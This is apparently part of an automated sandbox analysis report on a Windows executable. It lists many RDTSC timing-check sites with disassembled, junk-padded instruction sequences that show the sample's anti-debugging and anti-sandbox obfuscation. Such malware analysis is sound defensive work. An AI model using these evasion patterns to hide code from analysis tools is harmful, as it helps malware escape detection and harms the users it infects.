                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35A036 second address: 35A042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29FC524576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35C1C5 second address: 35C1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35C830 second address: 35C852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F29FC524581h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35C852 second address: 35C856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35C856 second address: 35C85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 35C85A second address: 35C860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31D5C5 second address: 31D5E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Dh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F29FC524576h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31D5E8 second address: 31D5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 31D5EE second address: 31D5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363D44 second address: 363D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363D4E second address: 363D73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F29FC52457Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363EC9 second address: 363ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363ECD second address: 363EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363EE9 second address: 363EF3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363EF3 second address: 363F05 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC52457Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 363F05 second address: 363F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36430E second address: 36433E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524588h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F29FC524582h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36433E second address: 364342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 364342 second address: 364361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F29FC5245B3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC52457Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678DD second address: 3678EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678EC second address: 3678F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678F2 second address: 3678F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3678F6 second address: 3678FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367985 second address: 3679F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F29FC6B5CA5h 0x0000000d jmp 00007F29FC6B5CA9h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F29FC6B5CA9h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push edi 0x0000001f pushad 0x00000020 jns 00007F29FC6B5C96h 0x00000026 jmp 00007F29FC6B5C9Ch 0x0000002b popad 0x0000002c pop edi 0x0000002d mov eax, dword ptr [eax] 0x0000002f push edx 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3679F7 second address: 367A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367A07 second address: 367A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F29FC6B5C98h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 stc 0x00000022 call 00007F29FC6B5C99h 0x00000027 push eax 0x00000028 push edx 0x00000029 jnl 00007F29FC6B5C9Ch 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367A42 second address: 367A5E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC524578h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29FC52457Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367A5E second address: 367A74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367C01 second address: 367C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367EA6 second address: 367EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367FB8 second address: 367FC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367FC2 second address: 367FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367FCC second address: 367FE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F29FC524584h 0x0000000f pushad 0x00000010 jc 00007F29FC524576h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3680A9 second address: 3680B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36818D second address: 368194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368194 second address: 368199 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36864F second address: 36866B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC52457Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F29FC524576h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36866B second address: 368686 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC6B5CA3h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368A39 second address: 368A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368AE1 second address: 368B07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F29FC6B5C98h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368B07 second address: 368B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368C7B second address: 368C80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 368C80 second address: 368CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124599BBh], ebx 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jnl 00007F29FC524576h 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F29FC524576h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3691C7 second address: 3691CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3691CB second address: 3691DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC524576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3691DD second address: 36923A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D1CDBh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F29FC6B5C98h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub edi, dword ptr [ebp+122D37D5h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F29FC6B5C98h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d mov edi, 070DB3BDh 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36923A second address: 369240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369240 second address: 369256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d je 00007F29FC6B5CAAh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369C1B second address: 369C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369C1F second address: 369C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 369C25 second address: 369C42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC4D second address: 36AC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC51 second address: 36AC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F29FC524576h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC5F second address: 36AC6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC6C second address: 36AC82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F29FC52457Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36AC82 second address: 36ACBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 add dword ptr [ebp+122D1FDBh], ebx 0x0000000c push 00000000h 0x0000000e mov edi, dword ptr [ebp+122D3941h] 0x00000014 mov dword ptr [ebp+122D2A3Ch], ebx 0x0000001a push 00000000h 0x0000001c jmp 00007F29FC6B5C9Bh 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F29FC6B5C9Fh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACBB second address: 36ACC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACC1 second address: 36ACD4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACD4 second address: 36ACD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36ACD8 second address: 36ACDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36B613 second address: 36B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36B409 second address: 36B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36B410 second address: 36B416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36BE7D second address: 36BE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36CA02 second address: 36CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E28D second address: 36E293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E293 second address: 36E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E298 second address: 36E29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36E29E second address: 36E2BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F29FC524586h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 36DFC6 second address: 36DFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37141F second address: 371424 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371424 second address: 371432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371432 second address: 37144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 370605 second address: 370609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 372495 second address: 3724B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC52457Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 ja 00007F29FC524576h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3724B5 second address: 3724BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371589 second address: 371651 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F29FC524585h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12452DD2h], ecx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movzx edi, ax 0x0000001e jp 00007F29FC524576h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F29FC524578h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 sub dword ptr [ebp+122D21F7h], ebx 0x0000004b mov eax, dword ptr [ebp+122D0209h] 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007F29FC524578h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b jmp 00007F29FC524582h 0x00000070 push FFFFFFFFh 0x00000072 jmp 00007F29FC524589h 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F29FC52457Fh 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371651 second address: 37166B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F29FC6B5C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37166B second address: 37166F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37353A second address: 37354F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC6B5C9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37354F second address: 373559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 372668 second address: 37266E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37266E second address: 372673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37445E second address: 374464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3736AE second address: 3736B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3736B3 second address: 3736B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
